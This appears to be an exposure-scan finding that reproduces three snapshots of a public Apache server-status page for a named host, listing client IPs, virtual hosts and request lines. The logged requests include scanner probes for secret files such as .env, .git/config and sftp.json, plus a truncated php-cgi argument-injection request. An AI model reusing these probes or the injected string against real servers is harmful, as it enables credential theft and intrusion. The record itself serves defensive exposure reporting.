139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-27226100650/424/36814_ 24.7200145485370.07.141050.93 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-27226100650/412/35025_ 24.7200147427770.08.71957.40 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-27226100650/410/36309_ 24.66124139491680.05.55995.95 172.64.215.190h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/44/29399_ 12.4900147270020.01.11808.74 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-27226098770/52/28642_ 12.331420174431090.01.10832.57 162.158.238.168h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-27226098770/54/29513_ 12.410922208162210.00.62894.33 172.69.224.11h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/51/28665_ 12.4910138098780.01.72817.66 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 2-27226098770/54/29038_ 12.4900107255590.00.481070.22 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-27226098770/55/29196_ 12.4900119976190.01.31850.56 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-27226098770/44/29088_ 12.4900117377950.01.78856.15 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-27226098770/52/28987_ 12.431388134101750.00.59860.64 172.71.124.12h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-27226098770/54/29333W 12.4500118377380.00.81927.16 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-27226098770/53/29101_ 12.4910153009500.01.60893.47 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-27226098780/17/34185_ 11.606710214389390.00.251091.24 162.158.120.144h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/19/33043_ 11.54785937165145470.01.66990.68 172.69.87.186h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/8/33891_ 11.606710172496210.00.311115.74 162.158.120.130h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/13/33355_ 11.626701218000280.00.231126.96 162.158.122.104h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/20/33314_ 11.676751140361600.00.171034.07 104.22.7.3h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/12/33322_ 11.236710150437730.00.441055.23 172.68.124.138h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/14/33616_ 9.536700122659530.00.181164.16 109.122.201.90http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/15/33669_ 11.696760249300550.00.471099.31 172.68.135.222h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/12/33034_ 9.31785254166363290.00.181037.83 147.182.131.78http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-27226098780/9/34169_ 11.696760172819590.00.761098.72 172.68.135.139h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/22/30600_ 11.296680281900330.00.39975.92 104.22.7.2h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/23/30803_ 11.296670129518550.00.491046.04 172.68.134.4h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/25/30861_ 11.246630130275210.00.271060.66 162.158.122.34h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/24/31146_ 11.286763142798730.07.44938.66 172.68.134.30h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-27226098790/28/30633_ 10.6767116814692008
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7558c7b5b03
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 09-May-2024 01:44:54 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 946 Parent Server MPM Generation: 945 Server uptime: 98 days 14 hours 1 minute 55 seconds Server load: 1.23 1.85 1.76 Total accesses: 2769699 - Total Traffic: 68.1 GB - Total Duration: 1591803227 CPU Usage: u256.12 s359.97 cu14351.3 cs9980.29 - .293% CPU load .325 requests/sec - 8.4 kB/second - 25.8 kB/request - 574.721 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03485698no7yes010006 13485695no2yes010001 23485697no1yes010000 33485696no3yes19002 43485856no4yes19000 Sum5017 248009 _________________________________W____________R___ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-94534856980/3/52384_ 0.0400250717100.00.131205.74 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-94534856980/3/52902_ 0.0400281865630.00.001205.44 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 0-94534856980/2/52417_ 0.0400329813420.00.001288.02 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-94534856980/2/52767_ 0.0300296242560.00.011226.43 46.101.111.185http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-94534856980/1/51351_ 0.0400244919720.00.001208.86 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-94534856980/1/51522_ 0.0300251629060.00.001287.67 46.101.111.185http/1.1 0-94534856980/1/51579_ 0.0400225554950.00.001177.93 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 0-94534856980/1/51860_ 0.03048378316980.00.011151.00 143.198.200.254http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 0-94534856980/1/52448_ 0.0300269073790.00.001148.76 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-94534856980/1/53637_ 0.0400240214870.00.002617.07 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 1-94534856950/4/57876_ 0.1000261184080.00.011379.48 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-94534856950/4/58065_ 0.0900356708620.00.021261.76 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 1-94534856950/3/57529_ 0.0900330678880.00.011216.37 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-94534856950/3/57481_ 0.0900278372490.00.011385.98 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-94534856950/4/57697_ 0.0900590459600.00.011310.29 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-94534856950/6/55791_ 0.1000414568860.00.021401.76 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 1-94534856950/3/56904_ 0.1000326298980.00.011346.72 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-94534856950/3/57250_ 0.1000350133210.00.011173.39 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 1-94534856950/3/59053_ 0.1000329901740.00.011448.89 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-94534856950/1/57667_ 0.0900307886770.00.001273.53 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-94534856970/3/54384_ 0.0400285664750.00.011228.94 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-94534856970/3/56256_ 0.0400295855350.00.001288.48 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 2-94534856970/2/56464_ 0.0400285113690.00.011199.47 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 2-94534856970/2/55455_ 0.0400402900580.00.002658.66 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-94534856970/1/55027_ 0.0400276715130.00.001407.55 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-94534856970/0/54862_ 0.00052362836910.00.001227.06 143.198.200.254http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-94534856970/1/55252_ 0.0400281054760.00.002651.92 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-94534856970/2/55082_ 0.0400267789080.00.521287.55 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-94534856970/2/55480_ 0.0400299126620.00.011252.46 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-94534856970/2/54697_ 0.0400346329260.00.001216.38 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 3-94534856960/2/55846_ 0.0400318038230.00.011318.19 164.92.244.132http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-94534856960/0/55120_ 0.000405255713670.00.001330.97 143.198.200.254http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-94534856960/2/56803_ 0.02058372594640.00.011288.86 143.198.200.254http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 3-94534856960/2/56558W 0.0400431880140.00.011360.61 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-94534856960/2/56127_ 0.0400327962040.00.031156.98 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-94534856960/1/56304_ 0.0400299392480.00.001318.92 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-94534856960/1/55811_ 0.010944306273690.00.001434.60 172.68.139.50h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-94534856960/0/55986_ 0.0000351804950.00.001185.16 46.101.111.185h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-94534856960/2/54773_ 0.0400376568090.00.001215.54 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-94534856960/1/56890_ 0.0400283770630.00.001314.15 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-94534858560/5/56647_ 0.20046358403530.00.021452.12 46.101.111.185http/1.1 4-94534858560/7/56685_ 0.2000288566950.00.072803.85 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-94534858560/6/54907_ 0.20044270420040.00.021269.72 143.198.200.254http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-94534858560/6/55580_ 0.2100380122180.00.021145.38 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-94534858560/2/55861_ 0.2100349483300.00.001385.46 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-94534858560/3/54269_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755564b3b76
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 08-May-2024 17:01:54 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 935 Parent Server MPM Generation: 934 Server uptime: 98 days 5 hours 18 minutes 55 seconds Server load: 1.31 1.26 1.20 Total accesses: 2761461 - Total Traffic: 67.9 GB - Total Duration: 1588399550 CPU Usage: u318.47 s384.62 cu14241.1 cs9927.04 - .293% CPU load .325 requests/sec - 8.4 kB/second - 25.8 kB/request - 575.203 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03463374no0yes010000 13463372no0yes010000 23463475no1yes19000 33463505no0yes010000 43463373no0yes010000 Sum501 149000 __________________________W_______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-93434633740/376/52232_ 18.9600250248550.05.311203.22 209.97.180.8http/1.1 0-93434633740/373/52744_ 19.3100281390910.05.121202.83 209.97.180.8http/1.1 0-93434633740/390/52272_ 19.29141632329387130.05.201286.92 172.68.23.159h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-93434633740/455/52629_ 19.361470295822100.019.861225.26 172.69.91.184h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-93434633740/404/51182_ 19.091420244431280.05.451207.40 172.70.185.167h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-93434633740/463/51370_ 19.312590251175330.06.161286.49 172.69.35.153h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-93434633740/459/51445_ 18.99130225193810.05.771177.26 209.97.180.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-93434633740/382/51717_ 19.312590377837990.04.431148.12 172.69.35.131h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-93434633740/512/52300_ 19.4000268635900.06.981147.55 209.97.180.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-93434633740/394/53488_ 19.3100239742340.04.562615.35 172.69.35.150h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-93434633720/277/57837_ 14.0414247261094060.016.341379.01 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-93434633720/212/58024_ 14.090154356666340.02.421261.38 195.76.155.42h2relehse.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-93434633720/290/57487_ 13.791470330579820.03.541215.13 172.69.223.76h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-93434633720/168/57445_ 14.111410278277240.03.731384.93 172.69.35.155h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-93434633720/199/57663_ 14.1100590308280.03.851309.55 209.97.180.8http/1.1 1-93434633720/188/55753_ 14.2100414453880.02.451400.27 209.97.180.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-93434633720/262/56863_ 14.161470326241020.03.441346.35 172.69.3.215h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-93434633720/339/57211_ 14.2100350031610.03.921172.80 209.97.180.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-93434633720/196/59016_ 14.081830329821720.03.651448.13 209.97.180.8http/1.1 1-93434633720/387/57627_ 14.080309307755880.05.731273.12 195.76.155.42h2relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-93434634750/587/53929_ 24.18023283544220.07.121217.04 209.97.180.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-93434634750/743/55804_ 24.2016431293897040.024.731278.71 172.69.7.5h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-93434634750/555/56006_ 24.081771282772240.07.191175.55 172.64.236.164h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-93434634750/568/54971_ 24.142721400604950.06.552647.40 212.145.142.113h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-93434634750/504/54580_ 24.111143274360580.019.751397.97 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-93434634750/459/54412_ 24.21031360623510.010.931217.72 85.62.79.37h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-93434634750/779/54804W 24.1600278999910.09.182620.42 209.97.180.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-93434634750/433/54635_ 24.2100265731750.08.301276.75 209.97.180.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-93434634750/641/55002_ 24.17111450297084220.09.071243.12 172.69.71.180h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-93434634750/563/54252_ 24.2111344152680.09.861207.75 209.97.180.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-93434635050/457/55724_ 20.46146354317536050.04.881315.65 172.69.91.55h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-93434635050/445/54985_ 20.488657254850450.05.181328.00 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-93434635050/621/56682_ 19.93049372019890.06.031286.82 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-93434635050/408/56442_ 20.241400431310570.018.761357.80 1.63.60.92http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-93434635050/427/55992_ 20.098130327353690.06.471154.98 213.192.214.80h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-93434635050/374/56185_ 20.5102298836440.05.181315.61 209.97.180.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-93434635050/507/55690_ 20.4112305708100.08.431431.23 209.97.180.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-93434635050/453/55874_ 20.3214121351289930.06.821183.67 1.63.60.92http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-93434635050/474/54642_ 20.458123375899450.07.981212.90 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-93434635050/527/56763_ 20.450455283341960.05.401312.63 209.97.180.8http/1.1 4-93434633730/141/56598_ 11.508633358251850.01.811451.43 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-93434633730/172/56641_ 11.39810288481780.03.112802.23 172.69.35.131h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-93434633730/155/54846_ 11.35205469270342660.02.141268.65 172.70.127.29h2tandemsl.com:443done, streams: 0/1/1/0/1 (open/recv/resp/push/rst) 4-93434633730/233/55528_ 11.5300379974770.04.031144.75 209.97.180.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-93434633730/213/55773_ 11.5300349403030.02.691384.67 209.97.180.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-93434633730/195/54223_ 11.40810303424070.05.351308.36 172.69.35.134h2tandemsl.com:443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755bda78e54
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 01-May-2024 00:30:24 CEST Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 856 Parent Server MPM Generation: 855 Server uptime: 90 days 12 hours 47 minutes 25 seconds Server load: 1.02 1.02 1.00 Total accesses: 2549122 - Total Traffic: 63.0 GB - Total Duration: 1488585957 CPU Usage: u280.24 s354.59 cu13283.9 cs9377.95 - .298% CPU load .326 requests/sec - 8.4 kB/second - 25.9 kB/request - 583.96 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03215719no0yes010000 13215587no0yes010000 23215590no0yes19000 33215588no0yes010000 43215589no0yes010000 Sum500 149000 __________________________W_______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-85532157190/400/48964_ 24.2846122237432010.07.611130.47 193.26.115.185h2barrerasdecontencion.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 0-85532157190/388/49846_ 24.282151270698850.08.391124.33 193.26.115.185h2barrerasdecontencion.com:443done, streams: 0/7/7/0/0 (open/recv/resp/push/rst) 0-85532157190/331/49216_ 24.60461318220900.08.121233.96 172.70.135.216h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-85532157190/444/49458_ 24.6220284989580.020.131121.69 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-85532157190/330/47795_ 24.2841175233191690.018.461115.53 193.26.115.185h2barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-85532157190/308/47995_ 24.356680240374800.020.151203.77 172.69.7.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-85532157190/314/48616_ 24.28668183214381380.09.821080.08 193.26.115.185h2barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-85532157190/320/48571_ 24.25410365547210.07.291083.57 172.69.135.106h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-85532157190/314/49036_ 24.2837182251897140.06.421076.06 164.90.228.79h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-85532157190/464/50412_ 24.2939103229475850.019.342525.26 164.90.228.79h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-85532155870/62/55162_ 8.889000253890740.013.661299.06 172.69.134.211h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-85532155870/60/55497_ 8.85381349431510.01.021209.92 164.90.228.79http/1.1 1-85532155870/58/54696_ 8.861400324155800.01.791150.12 157.254.236.250http/1.1 1-85532155870/49/55092_ 8.87361271778450.04.441337.61 164.90.228.79http/1.1 1-85532155870/59/55007_ 9.20297583565090.01.041228.90 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-85532155870/60/53425_ 8.899001407291940.05.101343.10 172.68.10.191h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-85532155870/61/54028_ 8.87391289727970.01.361287.36 164.90.228.79h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-85532155870/56/54632_ 9.2110337633410.01.411115.44 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-85532155870/64/56543_ 9.161400322934360.01.301363.91 157.254.236.250http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 1-85532155870/64/54975_ 8.981288298452370.01.141190.69 172.69.59.54h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-85532155900/266/49522_ 17.00380262120490.06.671109.88 172.70.134.150h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-85532155900/192/51434_ 17.01391270173580.05.531180.96 172.70.134.38h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-85532155900/219/51798_ 16.95390260607260.04.051085.68 172.71.147.214h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-85532155900/151/50275_ 16.98380351722690.02.332548.46 162.158.41.29h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-85532155900/183/50190_ 16.9700240165380.04.611294.11 162.158.41.3h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-85532155900/294/50206_ 17.03311337936150.05.221094.23 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-85532155900/189/49874W 17.0100255387890.03.052514.97 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-85532155900/188/50322_ 17.0430242494290.03.931176.47 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-85532155900/177/50597_ 16.9331267539990.05.061112.92 172.71.146.16h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-85532155900/172/49878_ 16.94404315130370.03.711120.50 172.71.146.238h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-85532155880/56/49232_ 9.9330264868820.02.101212.88 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-85532155880/55/49039_ 9.61600236278630.01.481225.81 172.69.23.59h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-85532155880/163/50619_ 9.6000349812810.01.851175.99 172.68.10.162h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-85532155880/114/50393_ 9.71371412056550.01.681208.03 164.90.228.79h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-85532155880/60/49506_ 9.61380302482280.03.031059.45 164.90.228.79http/1.1 3-85532155880/56/50113_ 9.64550279633180.00.601237.64 172.71.184.63h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-85532155880/72/49260_ 9.91603281277260.04.321258.49 172.71.147.74h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-85532155880/62/49098_ 9.65551330289620.01.111076.24 172.71.158.252h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-85532155880/55/48380_ 9.59395357889780.01.501104.57 164.90.228.79h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-85532155880/58/49865_ 9.639010266581670.01.361187.39 172.69.22.61h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-85532155890/56/51662_ 9.5900337001690.01.301336.51 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-85532155890/58/52177_ 9.57402262891370.04.092662.91 164.90.228.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-85532155890/40/50441_ 9.24542246489980.00.551118.66 172.68.10.148h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-85532155890/54/50561_ 9.28591361155840.01.301044.40 172.69.134.162h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-85532155890/40/51188_ 9.28400318338820.00.891274.11 172.71.184.189h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-85532155890/53/49709_ 9.25540280057330.01.131114.21 172.68.10.180
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755542a92e9
